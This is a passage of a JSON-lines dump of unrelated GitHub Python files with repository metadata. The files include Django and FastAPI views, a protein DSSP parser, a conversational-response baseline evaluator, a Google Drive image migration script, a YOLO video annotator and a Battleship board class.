...
\n\t\t#...
\n\t\t#\n\t\t# ...\n\t\t#
\n\t\t#')\n elif not l.name == 'ul':\n l_str = l.string\n if l_str is not None:\n lines.append(str(l.string))\n self.text = ''.join(lines)\n","repo_name":"DengYiping/wenku8scraper","sub_path":"pageparser.py","file_name":"pageparser.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12364335323","text":"# Create your views here.\n\nimport os.path\nimport tasks\nimport time\nfrom models import Image\nfrom django.conf import settings\nfrom django.shortcuts import render, HttpResponseRedirect\nfrom apps.findbestroute.forms import ImageUploadForm\nfrom apps.findbestroute.models import *\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect\nfrom apps.findbestroute.models import *\nfrom apps.findbestroute.forms import ImageUploadForm\nimport forms\nfrom tasks import runScript\nimport os\nfrom django.conf import settings\n\n# Create your views here.\n\n\ndef file_exists(some_file):\n my_file = some_file\n destination = settings.MEDIA_ROOT + 'test_files/'\n return True if os.path.isfile(destination + my_file.name) else False\n # returns true if file exists; otherwise false\n# raise fo.ValidationError(\n# 'A file with the name \"' + my_file.name + '\" already exists. Please, rename your file and try again.'\n# )\n\n\ndef index(request):\n return render(request, 'frontpage.html')\n\n\ndef vis_filer(request):\n file_objects = UploadedFile.objects.filter(uploader=request.user)\n files = list()\n for fo in file_objects:\n files.append(fo.file)\n if files is not None:\n return render(request, 'vis_filer.html', {'files': files})\n return render(request, 'vis_filer.html', {'files': None})\n\n\ndef last_opp_filer(request):\n if request.method == 'POST':\n #print('Correct request method...')\n form = forms.MultiUploadForm(request.POST, request.FILES)\n if form.is_valid():\n #print('Form is valid...')\n files = request.FILES.getlist('files')\n jpg_background = request.FILES.getlist('jpg_background')\n\n for j in jpg_background:\n if file_exists(j):\n continue\n k = UploadedFile()\n k.uploader = request.user\n k.file = j\n k.save()\n print('jpg-file saved')\n\n del k\n\n for f in files:\n if file_exists(f):\n continue\n m = UploadedFile()\n m.uploader = request.user\n m.file = f\n m.save()\n print('shape-file saved')\n # One entry in the DB per file\n del m\n # Begin Celery processes\n print('Trying to make best route')\n\n # KJOYR GUTAR WOOOOHOOOOOOOO\n tasks.runScript.delay(request.user.pk)\n #tasks.delete_user_uploads.delay(request.user.pk)\n return HttpResponseRedirect('analyse.html')\n\n form = forms.MultiUploadForm()\n return render(request, 'last_opp_filer.html', {'form': form} )\n\ndef analyse(request):\n return render(request=request, template_name='analyse.html', context=None)\n\n\ndef lastOppBilder(request):\n if request.method == 'POST':\n form = ImageUploadForm(request.POST, request.FILES)\n if form.is_valid():\n m = Image()\n m.uploader = request.user\n m.bilde = form.cleaned_data['bilde']\n m.save()\n # tror ikke dette skal vere her\n # runScript.delay(request.user.pk)\n return HttpResponseRedirect(m.get_absolute_url())\n\n form = ImageUploadForm()\n return render(request, 'bildeopplasting.html', {'form': form})\n\n# data = httpRequest object; data.FILES.getlist('files') --> .shp filer, etc.\n\n\ndef listOppBilder(request):\n# imageModels = Image.objects.all()\n imageModels = Image.objects.all()\n if imageModels.__len__()>0:\n text = \"There exists \"+str(imageModels.__len__())+\" images in database\"\n else:\n text = \"There are no images in the database\"\n\n return render(request, 'list_opp_bilder.html', {'text': text, 'images': imageModels})\n\n\ndef visBilde(request, image_id):\n image = Image.objects.get(pk=image_id)\n return render(request, 'vis_bilde.html', {'Image': image})\n\n\n","repo_name":"TrulsElg/GIB2-prosjekt","sub_path":"apps/findbestroute/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"39913617840","text":"#!/usr/bin/env python\n\n\"\"\"\nExtract DSSP features directly from a DSSP output file with this script.\nThe DSSP output file can be attained by running the dssp executable file with\nthe target pdb file as input.\nYou will need both the pdb file and the dssp output file\n\"\"\"\n\nimport os\nimport math\nimport Bio\nfrom Bio.PDB import *\n\n__author__ = \"A.J. Preto\"\n__email__ = \"martinsgomes.jose@gmail.com\"\n__group__ = \"Data-Driven Molecular Design\"\n__group_leader__ = \"Irina S. Moreira\"\n__project__ = \"MENSAdb\"\n\ndef pdb_parser(input_pdb):\n\n \"\"\"\n Parses pdb from .pdb file\n \"\"\"\n parser = PDBParser()\n pdb_name = input_pdb[0:-4]\n structure = parser.get_structure(pdb_name, input_pdb)\n return structure, pdb_name\n\ndef DSSP_gap_dictionary():\n\n \"\"\"\n DSSP files are not easily separable by default character.\n As such, it can be accurately split by space values, which are stated below\n \"\"\"\n dssp_gaps = {\"0\":[0,5], \"1\":[5,10], \"2\":[10,12], \"3\": [12,14], \"4\":[14,22], \"5\":[22,33],\n \"6\":[34,38],\"7\":[38,50], \"8\":[50,61], \"9\":[61,72], \"10\":[72,83], \"11\":[83,91],\n \"12\":[91,97], \"13\":[97,103], \"14\":[103,109], \"15\":[109,115], \"16\":[115,122],\n \"17\":[122,129], \"18\":[129, 136], \"19\":[136, 150]}\n return dssp_gaps\n\ndef round_number(input_number, round_to = 2):\n\n \"\"\"\n Simple function to round a number to \"round_to\"\n decimal houses. Change \"round_to\" to modify the default number of decimal houses\n \"\"\"\n if len(str(input_number)) == 0:\n input_number = 0.0\n return round(float(input_number), round_to)\n\ndef run_for_chain(input_file, input_target_chain, feature_number):\n\n feature_gaps = DSSP_gap_dictionary()\n feature_residues = {}\n residues_count = 0\n useful = False\n to_break = [7,8,9,10]\n for row in input_file:\n if useful == True:\n if row[feature_gaps[\"2\"][0]:feature_gaps[\"2\"][-1]].replace(\" \",\"\") == input_target_chain:\n residues_count = residues_count + 1\n if feature_number in to_break:\n feature_to_store = row[feature_gaps[str(feature_number)][0]:feature_gaps[str(feature_number)][1]].replace(\" \",\"\").split(\",\")\n average_float = (float(feature_to_store[0]) + float(feature_to_store[1])) / float(2)\n feature_value = round_number(average_float)\n feature_residues[residues_count] = feature_value\n else:\n feature_value = round_number(row[feature_gaps[str(feature_number)][0]:feature_gaps[str(feature_number)][1]].replace(\" \",\"\"))\n feature_residues[residues_count] = feature_value\n if row[feature_gaps[\"0\"][0]:feature_gaps[\"0\"][-1]].replace(\" \",\"\") == \"#\":\n useful = True\n return feature_residues\n \n\ndef DSSP_features(input_pdb, feature_number, dssp_termination = \"_dssp.txt\", pdb_chain = None):\n\n \"\"\"\n Retrieves the features 0-13 described bellow, from bioython structure object\n - 0 DSSP index \n - 1 Amino acid number\n - 2 Amino acid code\n - 3 Chain \n - 4 Secondary Structure\n - 5 BP\n - 6 ASA\n - 7 NH-->O_1_relidx \n - 8 O-->NH_1_relidx \n - 9 NH-->O_1_energy \n - 10 O-->NH_1_energy \n - 11 TCO \n - 12 KAPPA \n - 13 Alpha \n - 14 Phi \n - 15 Psi \n - 16 X-CA\n - 17 Y-CA\n - 18 Z-CA\n\n Change the \"dssp_termination\" argument if it does not correspond to your own\n \"\"\"\n structure = pdb_parser(input_pdb)[0]\n dssp_name = \"output/\" + input_pdb[0:-4] + dssp_termination\n opened_file = open(dssp_name, \"r\").readlines()\n chain_SS_sequences = []\n useful = False\n \n output_features = run_for_chain(opened_file, pdb_chain , feature_number)\n return output_features\n\n\n","repo_name":"MoreiraLAB/mensadb-open","sub_path":"dssp_features.py","file_name":"dssp_features.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32486514394","text":"import argparse\nimport os\nimport sys\n\nfrom git import Repo\nfrom semantic_version import Version\n\nfrom git_semver import get_current_version\nfrom git_semver.constants import ERR_NO_VERSION_FOUND, ERR_NOT_A_REPO\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--next-patch\", \"-p\", dest=\"modifier\", action=\"store_const\", const=Version.next_patch)\n parser.add_argument(\"--next-minor\", \"-m\", dest=\"modifier\", action=\"store_const\", const=Version.next_minor)\n parser.add_argument(\"--next-major\", \"-M\", dest=\"modifier\", action=\"store_const\", const=Version.next_major)\n\n options = parser.parse_args(sys.argv[1:] if args is None else args)\n\n try:\n repo = Repo(os.getcwd())\n except:\n print(\"fatal: Not a git repository\", file=sys.stderr)\n return ERR_NOT_A_REPO\n\n version = get_current_version(repo)\n if version is None:\n print(\"No version found. Try creating a tag with your initial version, for example:\", file=sys.stderr)\n print(\" git tag -am 0.1.0 0.1.0\", file=sys.stderr)\n return ERR_NO_VERSION_FOUND\n\n if options.modifier:\n version = options.modifier(version)\n\n print(str(version).strip(\"-\"))\n return 0\n","repo_name":"hartym/git-semver","sub_path":"git_semver/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"22"} +{"seq_id":"17006807090","text":"from fastapi import APIRouter, HTTPException, Depends, Query\nfrom pydantic import BaseModel, validator, Field\nimport os\nimport re\nfrom typing import Optional\nimport time\nfrom ..config import logger\nfrom ..utils.db import vector_query\nfrom ..utils.auth import get_auth\n\nrouter = APIRouter()\n\n# Define the model and the tokenizer\ntop_k = 5 # Default value; adjust as needed\n\n@router.get(\"/search\")\ndef search(query: str = Query(..., min_length=1), results_to_return: Optional[int] = Query(top_k, gt=0), user_table: Optional[bool] = Query(False), claims: dict = Depends(get_auth)):\n \"\"\"\n Endpoint to perform a search against the embeddings dataset.\n\n Takes a JSON object containing the search query and the number of results to return.\n\n Parameters:\n query (str): The search query string.\n results_to_return (int, optional): Number of results to return. Default is 5.\n user_table (bool, optional): Optional parameter to specify username for the table to search, must be an alphanumeric value or a valid email address.\n\n Curl example:\n curl 'http://127.0.0.1:8000/search?query=string&results_to_return=5&user_table=false'\n\n Returns:\n dict: A dictionary containing the search results and the time taken to fetch them. \n Example:\n {\n \"time_elapsed\": 0.2,\n \"results\": [\n {\n \"Title\": \"What is Malware?\",\n \"Link\": \"http://example.com/malware\",\n \"embedding_text\": \"text_body\"\n },\n ...\n ]\n }\n \n Errors:\n If an error occurs during the execution, a JSON object containing an error message is returned.\n Example: {\"error\": \"description of the error\"}\n \"\"\"\n\n ## Uncomment the following lines to enable authentication\n username = claims.get('cognito:username') if user_table else None\n try:\n start_time = time.time() \n top_results = vector_query(query, results_to_return, username)\n end_time = time.time()\n time_elapsed = round(end_time - start_time, 2)\n results = []\n for result in top_results['matches']:\n metadata = result['metadata']\n # Extract the Title and Link or file information from the metadata\n link = metadata.get(\"URL\", [])\n result_data = {}\n\n if metadata.get(\"Title\", \"unknown\") != \"unknown\":\n result_data[\"Title\"] = metadata.get(\"Title\")\n if link:\n result_data[\"Link\"] = link\n if metadata.get(\"PublicationDate\", \"unknown\") != \"unknown\":\n result_data[\"Published\"] = metadata.get(\"PublicationDate\")\n if metadata.get(\"Author\", \"unknown\") != \"unknown\":\n result_data[\"Author\"] = metadata.get(\"Author\")\n if metadata.get(\"Tags\", \"unknown\") != \"unknown\":\n result_data[\"Tags\"] = metadata.get(\"Tags\")\n if metadata.get(\"Filename\", \"unknown\") != \"unknown\":\n result_data[\"Filename\"] = metadata.get(\"Filename\")\n if metadata.get(\"text\", \"unknown\") != \"unknown\":\n result_data[\"embedding_text\"] = metadata.get(\"text\")\n if metadata.get(\"doc_id\", \"unknown\") != \"unknown\":\n result_data[\"DocumentID\"] = metadata.get(\"doc_id\")\n result_data[\"similarity_score\"] = round(result['score'], 2)\n results.append(result_data)\n\n response = {\n \"time_elapsed\": time_elapsed,\n \"results\": results\n }\n\n return response\n\n except Exception as e:\n logger.error(e)\n return {\"error\": str(e)}\n finally:\n pass","repo_name":"TrainGRC/textweaver","sub_path":"weaver/routers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"15553241376","text":"#!/usr/bin/env python\n# coding: utf-8\n# Author: Hairong Wang\n\nimport json\nimport pandas as pd\n\n# Complete file name for amazonqa training dataset(squad format)\nINFILE = \"path/to/input/file\"\nOUTFILE = \"path/to/output/file\"\n\nclass AmazonQASampler:\n def __init__(self, infile):\n self._infile = infile\n\n def get_df(self):\n i = 0\n df = {}\n with open(self._infile, 'r') as fp:\n for line in fp:\n df[i] = json.loads(line)\n i += 1\n return pd.DataFrame.from_dict(df, orient='index')\n\n def sample(self):\n squad_train_df = self.get_df()\n amazonqa_sample = squad_train_df.sample(1000)\n return amazonqa_sample\n\ndef main():\n sampler = AmazonQASampler(INFILE)\n amazonqa_sample = sampler.sample()\n amazonqa_sample.to_json(OUTFILE)\n\n\nif __name__=='__main__':\n main()\n","repo_name":"hairong-wang/OnPoint","sub_path":"onpoint/amazonqasampler.py","file_name":"amazonqasampler.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"44906217492","text":"\"\"\"Evaluate baseline models on conversational datasets.\n\nFor usage see README.md.\n\"\"\"\n\nimport argparse\nimport csv\nimport enum\nimport random\n\nimport glog\nimport numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nfrom baselines import keyword_based, vector_based\n\n\ndef _parse_args():\n \"\"\"Parse command-line args.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--method\",\n type=Method.from_string, choices=list(Method), required=True,\n help=\"The baseline method to use.\")\n parser.add_argument(\n \"--recall_k\", type=int,\n default=100, help=\"The value of k to compute recall at.\")\n parser.add_argument(\n \"--train_dataset\", type=str, required=True,\n help=\"File pattern of train set.\")\n parser.add_argument(\n \"--train_size\", type=int, default=10000,\n help=\"Number of examples from the training set to use in training.\")\n parser.add_argument(\n \"--test_dataset\", type=str, required=True,\n help=\"File pattern of test set.\")\n parser.add_argument(\n \"--eval_num_batches\", type=int, default=500,\n help=\"Number of batches to use in the evaluation.\")\n parser.add_argument(\n \"--output_file\", type=str,\n help=\"Optional file to output result as a CSV row.\")\n parser.add_argument(\n \"--deduplicate_eval\", default=False, action=\"store_true\",\n help=\"If set, the evaluation will de-duplicate examples with \"\n \"identical contexts.\")\n return parser.parse_args()\n\n\nclass Method(enum.Enum):\n # Keyword based methods.\n TF_IDF = 1\n BM25 = 2\n\n # Vector similarity based methods.\n USE_SIM = 3\n USE_LARGE_SIM = 4\n ELMO_SIM = 5\n BERT_SMALL_SIM = 6\n BERT_LARGE_SIM = 7\n USE_QA_SIM = 8\n CONVERT_SIM = 9\n\n # Vector mapping methods.\n USE_MAP = 10\n USE_LARGE_MAP = 11\n ELMO_MAP = 12\n BERT_SMALL_MAP = 13\n BERT_LARGE_MAP = 14\n USE_QA_MAP = 15\n CONVERT_MAP = 16\n\n def to_method_object(self):\n \"\"\"Convert the enum to an instance of `BaselineMethod`.\"\"\"\n if self == self.TF_IDF:\n return keyword_based.TfIdfMethod()\n elif self == self.BM25:\n return keyword_based.BM25Method()\n elif self == self.USE_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder/2\"))\n elif self == self.USE_LARGE_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder-large/3\"))\n elif self == self.ELMO_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/elmo/1\"))\n elif self == self.USE_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder/2\"))\n elif self == self.USE_LARGE_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder-large/3\"))\n elif self == self.ELMO_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.TfHubEncoder(\n \"https://tfhub.dev/google/elmo/1\"))\n elif self == self.BERT_SMALL_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.BERTEncoder(\n \"https://tfhub.dev/google/\"\n \"bert_uncased_L-12_H-768_A-12/1\"))\n elif self == self.BERT_SMALL_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.BERTEncoder(\n \"https://tfhub.dev/google/\"\n \"bert_uncased_L-12_H-768_A-12/1\"))\n elif self == self.BERT_LARGE_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.BERTEncoder(\n \"https://tfhub.dev/google/\"\n \"bert_uncased_L-24_H-1024_A-16/1\"))\n elif self == self.BERT_LARGE_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.BERTEncoder(\n \"https://tfhub.dev/google/\"\n \"bert_uncased_L-24_H-1024_A-16/1\"))\n elif self == self.USE_QA_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.USEDualEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder-multilingual-qa/1\"))\n elif self == self.USE_QA_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.USEDualEncoder(\n \"https://tfhub.dev/google/\"\n \"universal-sentence-encoder-multilingual-qa/1\"))\n elif self == self.CONVERT_SIM:\n return vector_based.VectorSimilarityMethod(\n encoder=vector_based.ConveRTEncoder(\n \"http://models.poly-ai.com/convert/v1/model.tar.gz\"))\n elif self == self.CONVERT_MAP:\n return vector_based.VectorMappingMethod(\n encoder=vector_based.ConveRTEncoder(\n \"http://models.poly-ai.com/convert/v1/model.tar.gz\"))\n raise ValueError(\"Unknown method {}\".format(self))\n\n def __str__(self):\n \"\"\"String representation to use in argparse help text.\"\"\"\n return self.name\n\n @staticmethod\n def from_string(s):\n \"\"\"Convert a string parsed from argparse to an enum instance.\"\"\"\n try:\n return Method[s]\n except KeyError:\n raise ValueError()\n\n\ndef _evaluate_method(method, recall_k, contexts, responses):\n accuracy_numerator = 0.0\n accuracy_denominator = 0.0\n for i in tqdm(range(0, len(contexts), recall_k)):\n context_batch = contexts[i:i + recall_k]\n responses_batch = responses[i:i + recall_k]\n if len(context_batch) != recall_k:\n break\n\n # Shuffle the responses.\n permutation = np.arange(recall_k)\n np.random.shuffle(permutation)\n context_batch_shuffled = [context_batch[j] for j in permutation]\n\n predictions = method.rank_responses(\n context_batch_shuffled, responses_batch)\n if predictions.shape != (recall_k, ):\n raise ValueError(\n \"Predictions returned by method should have shape ({}, ), \"\n \"but saw {}\".format(recall_k, predictions.shape))\n accuracy_numerator += np.equal(predictions, permutation).mean()\n accuracy_denominator += 1.0\n\n accuracy = 100 * accuracy_numerator / accuracy_denominator\n return accuracy\n\n\ndef _load_data(file_pattern, num_examples, deduplicate=False):\n \"\"\"Load contexts and responses from the given conversational dataset.\"\"\"\n contexts = []\n responses = []\n seen_contexts = set()\n complete = False\n with tqdm(total=num_examples) as progress_bar:\n file_names = tf.gfile.Glob(file_pattern)\n random.shuffle(file_names)\n if not file_names:\n raise ValueError(\n \"No files matched pattern {}\".format(file_pattern))\n for file_name in file_names:\n glog.info(\"Reading %s\", file_name)\n for record in tf.python_io.tf_record_iterator(file_name):\n example = tf.train.Example()\n example.ParseFromString(record)\n context = example.features.feature[\n 'context'].bytes_list.value[0].decode(\"utf-8\")\n if deduplicate and context in seen_contexts:\n continue\n if deduplicate:\n seen_contexts.add(context)\n contexts.append(context)\n response = example.features.feature[\n 'response'].bytes_list.value[0].decode(\"utf-8\")\n responses.append(response)\n progress_bar.update(1)\n if len(contexts) >= num_examples:\n complete = True\n break\n if complete:\n break\n glog.info(\"Read %i examples\", len(contexts))\n if not complete:\n glog.warning(\n \"%i examples were requested, but dataset only contains %i.\",\n num_examples, len(contexts))\n\n return contexts, responses\n\n\nif __name__ == \"__main__\":\n args = _parse_args()\n method = args.method.to_method_object()\n glog.info(\"Loading training data\")\n contexts_train, responses_train = _load_data(\n args.train_dataset, args.train_size)\n\n glog.info(\"Training %s method\", args.method)\n method.train(contexts_train, responses_train)\n\n glog.info(\"Loading test data\")\n contexts_test, responses_test = _load_data(\n args.test_dataset, args.eval_num_batches * args.recall_k,\n deduplicate=args.deduplicate_eval)\n\n glog.info(\"Running evaluation\")\n accuracy = _evaluate_method(\n method, args.recall_k, contexts_test, responses_test)\n glog.info(\n \"Final computed 1-of-%i accuracy is %.1f%%\",\n args.recall_k, accuracy\n )\n\n if args.output_file is not None:\n with open(args.output_file, \"a\") as f:\n csv_writer = csv.writer(f)\n csv_writer.writerow([\n args.method, args.train_dataset, args.test_dataset,\n len(contexts_train), len(contexts_test),\n args.recall_k, accuracy\n ])\n","repo_name":"PolyAI-LDN/conversational-datasets","sub_path":"baselines/run_baseline.py","file_name":"run_baseline.py","file_ext":"py","file_size_in_byte":9760,"program_lang":"python","lang":"en","doc_type":"code","stars":1190,"dataset":"github-code","pt":"22"} +{"seq_id":"41422387738","text":"from __future__ import print_function\nimport httplib2\nimport os, io\nimport urllib.request\nimport shutil\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\nfrom apiclient.http import MediaFileUpload, MediaIoBaseDownload\nimport os\nfrom shortid import ShortId\nsid = ShortId()\nfrom pymongo import MongoClient\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\nimport auth\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/drive-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/drive'\nCLIENT_SECRET_FILE = 'credentials.json'\nAPPLICATION_NAME = 'Drive API Python Quickstart'\nauthInst = auth.auth(SCOPES,CLIENT_SECRET_FILE,APPLICATION_NAME)\ncredentials = authInst.getCredentials()\n\nhttp = credentials.authorize(httplib2.Http())\ndrive_service = discovery.build('drive', 'v3', http=http)\n\nclient = MongoClient('mongodb://localhost:27017/') # URL of MongoDB Database\ndb = client['prod'] # Database Name \nepisodes = db.episodes # Collection from the Database\n\n# This function uploads file to google drive\n# Arguments:- filename, filepath, filetype\ndef uploadFile(filename,filepath,mimetype):\n # In parent put ID of Folder in which files to be uploaded please give appropriate permisssions to the folder if you want to access the files without login give public access to the folder\n file_metadata = {'name': filename, \"parents\": [\"1UFXxiR1vXMfMXG-8IfV7Xo7zT_DjpJzF\"]}\n media = MediaFileUpload(filepath,\n mimetype=mimetype)\n file = drive_service.files().create(body=file_metadata,\n media_body=media,\n fields='webContentLink').execute()\n # Returns a link for the the file\n return file.get('webContentLink') \n\nprint('Starting Upload')\n\n# Keeps track of the count\ncount = 0\n\n# For tracking the upload of files we have added a new field in mongodb object called uploaded this tells us about the status of upload\nfor data in episodes.find({\"uploded\": False}, {\"poster\": 1}):\n link=data[\"poster\"]\n newLink = ''\n count=count+1\n print(count)\n if count%200 == 0: # This ensures files don't pile up in our system by deleting the whole folder and creating it again\n shutil.rmtree('temp') \n os.mkdir('temp')\n try:\n file_name=sid.generate() # This generates unique filenames\n urllib.request.urlretrieve(link, 'temp/'+file_name+'.jpg') # Downloades the image\n link = uploadFile(file_name+'.jpg','temp/'+file_name+'.jpg','image/jpeg') # Uploads the image\n newLink=link.replace('download','view',1) # Make the link viewable \n print(newLink) # Print the link\n # Update the MongoDB object with new link\n update = episodes.update_one({\"_id\": data[\"_id\"]},{\"$set\": {\"poster\": newLink, \"uploded\": True}})\n except:\n print(link) # Print link in which error occured\n # Update the MongoDB with uploaded true if you want to skip this link else make it false\n update = episodes.update_one({\"_id\": data[\"_id\"]},{\"$set\": {\"uploded\": True}})\n continue\n\nprint(\"All Done\")","repo_name":"Swap76/Move_Assets_To_Google_Drive","sub_path":"singleThread_Upload.py","file_name":"singleThread_Upload.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"70726577977","text":"import os, doxter\n\nclass BookProcessor(doxter.Processor):\n\tdef __init__(self):\n\t\tself.page = doxter.get_config('page')\n\t\tself.output_file = doxter.get_config('output_file', 'index.html')\n\t\tself.autolinks = doxter.get_processor_by_name('AutoLinksProcessor')\n\t\tself.toc = doxter.get_processor_by_name('TOCProcessor')\n\t\tself.template = doxter.get_processor_by_name('TemplateProcessor')\n\t\tself.output = doxter.get_processor_by_name('OutputProcessor')\n\t\tself.content = ''\n\n\tdef priority(self):\n\t\treturn -4\n\n\tdef process(self, root, extension, content):\n\t\tself.content += content\n\t\treturn None\n\n\tdef teardown(self):\n\t\tself.page.set('filename', self.output_file)\n\t\tself.page.set('basename', os.path.basename(self.output_file))\n\t\troot, extension = os.path.splitext(self.output_file)\n\t\tcontent = self.autolinks.process(root, extension, self.content)\n\t\tcontent = self.toc.process(root, extension, content)\n\t\tcontent = self.template.process(root, extension, content)\n\t\tcontent = self.output.process(root, extension, content)\n","repo_name":"icebreaker/doxter","sub_path":"examples/book/_plugins/bookprocessor.py","file_name":"bookprocessor.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"22"} +{"seq_id":"27583155413","text":"from ultralytics import YOLO\nimport cv2\nimport numpy as np\nimport torch\nimport time\nclass Async:\n def __init__(self):\n self.model = YOLO(\"yolov8-trained.pt\")\n self.classes = self.model.names\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print(\"\\n\\nDevice Used:\", self.device)\n\n def score_frame(self, frame):\n results = self.model(frame)\n annotated_frame = self.annotate_frame(frame, results)\n return annotated_frame\n\n def annotate_frame(self, frame, results):\n annotated_frame = frame.copy() # Create a copy of the frame\n for result in results:\n annotated_frame = result.render(annotated_frame) # Annotate the frame\n return annotated_frame\n\n def process_video(self):\n cap = cv2.VideoCapture(0)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n output_video = cv2.VideoWriter('annotated_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 30, (width, height))\n\n while cap.isOpened():\n start_time = time.perf_counter()\n ret, frame = cap.read()\n if not ret:\n break\n annotated_frame = self.score_frame(frame)\n output_video.write(annotated_frame) # Write the annotated frame to the video\n\n end_time = time.perf_counter()\n fps = 1 / np.round(end_time - start_time, 3)\n cv2.putText(annotated_frame, f'FPS: {int(fps)}', (20, 70), cv2.FONT_HERSHEY_SIMPLEX, 1.5)\n cv2.imshow(\"Annotated Frame\", annotated_frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n output_video.release()\n cv2.destroyAllWindows()\n\ndetection = Async()\ndetection.process_video()\n","repo_name":"ShufanSun/TrafficDetection","sub_path":"AsynchrousVideoProcessing.py","file_name":"AsynchrousVideoProcessing.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74284290617","text":"from BattleShip.GameLogic.BoardValue import BoardValueEnum\nfrom BattleShip.GamePieces.ShipType import ShipDirectionEnum\nfrom BattleShip.GamePieces.ShipType import ShipInformation\n\n\nclass GameBoard:\n MAX_ROW = 11\n MIN_ROW = 1\n MAX_COL = 11\n MIN_COL = 1\n \"\"\"This is the representation for the game board\"\"\"\n def __init__(self):\n # declare a 10 x 10 grid for the game, the extra 1 is to display the coordinates\n self.board = [[BoardValueEnum.UNOCCUPIED for i in range(GameBoard.MAX_ROW)] for j in range(GameBoard.MAX_COL)]\n # Fill the 1st row with numbers\n for i in range(len(self.board) - 1):\n self.board[i + 1][0] = i + 1\n # Fill the 1st column with letters\n for i in range(len(self.board)-1):\n self.board[0][i + 1] = chr(ord('A') + i)\n self.board[0][0] = ''\n\n def place_ship(self, ship):\n current_row = ship.row_placed\n current_col = ship.col_placed\n # check if the ship can be placed\n for i in range(int(ship.length)):\n if current_col < GameBoard.MIN_COL or current_row < GameBoard.MIN_ROW or \\\n current_row > GameBoard.MAX_ROW - 1 or current_col > GameBoard.MAX_COL - 1 or \\\n self.board[current_row][current_col] != BoardValueEnum.UNOCCUPIED:\n return False\n if ship.ship_direction == ShipDirectionEnum.HORIZONTAL:\n current_col += 1\n else:\n current_row += 1\n\n # reset column and row\n current_row = ship.row_placed\n current_col = ship.col_placed\n\n # it can be placed, so place it\n for i in range(int(ship.length)):\n self.board[current_row][current_col] = ShipInformation.boardValue.get(ship.ship_type)\n if ship.ship_direction == ShipDirectionEnum.HORIZONTAL:\n current_col += 1\n else:\n current_row += 1\n\n return True\n","repo_name":"JerryBLi/Battleship","sub_path":"BattleShip/GameLogic/GameBoard.py","file_name":"GameBoard.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13949398989","text":"# FSI - Project 2\n\nimport json\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom statistics import mean\n\n\n# Get metrics(accuracy, f1_score and precision) from json element\ndef get_metrics(json_el, hyperparam, average='macro'):\n accuracy_data = {}\n f1_score_data = {}\n precision_data = {}\n\n for fold, args in json_el.items():\n for hyperparam_obj in args:\n if hyperparam_obj['args'][hyperparam] in accuracy_data:\n accuracy_data[hyperparam_obj['args'][hyperparam]].append(hyperparam_obj['metrics']['accuracy'])\n f1_score_data[hyperparam_obj['args'][hyperparam]].append(hyperparam_obj['metrics']['f1_score'][average])\n precision_data[hyperparam_obj['args'][hyperparam]].append(\n hyperparam_obj['metrics']['precision'][average])\n else:\n accuracy_data[hyperparam_obj['args'][hyperparam]] = [hyperparam_obj['metrics']['accuracy']]\n f1_score_data[hyperparam_obj['args'][hyperparam]] = [hyperparam_obj['metrics']['f1_score'][average]]\n precision_data[hyperparam_obj['args'][hyperparam]] = 